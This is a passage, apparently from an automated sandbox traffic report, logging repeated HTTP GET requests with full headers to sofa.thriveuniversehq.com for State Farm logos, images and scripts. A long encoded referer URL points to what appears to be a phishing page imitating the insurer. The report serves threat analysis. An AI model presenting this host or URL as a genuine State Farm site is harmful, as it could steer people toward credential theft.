iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=8
              Source: global trafficHTTP traffic detected: GET /assets/bootstrap/dist/css/bootstrap.min.css HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMo
              Source: global trafficHTTP traffic detected: GET /assets/images/State-Farm-Logo.png HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2B
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBr
              Source: global trafficHTTP traffic detected: GET /assets/images/state-farm-drake-2021.jpg HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYib
              Source: global trafficHTTP traffic detected: GET /assets/bootstrap/dist/js/bootstrap.min.js HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiS
              Source: global trafficHTTP traffic detected: GET /assets/js/scripts-w14-t-f-qc-v2-fst-ri.js?v=5.40&cc=us HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmO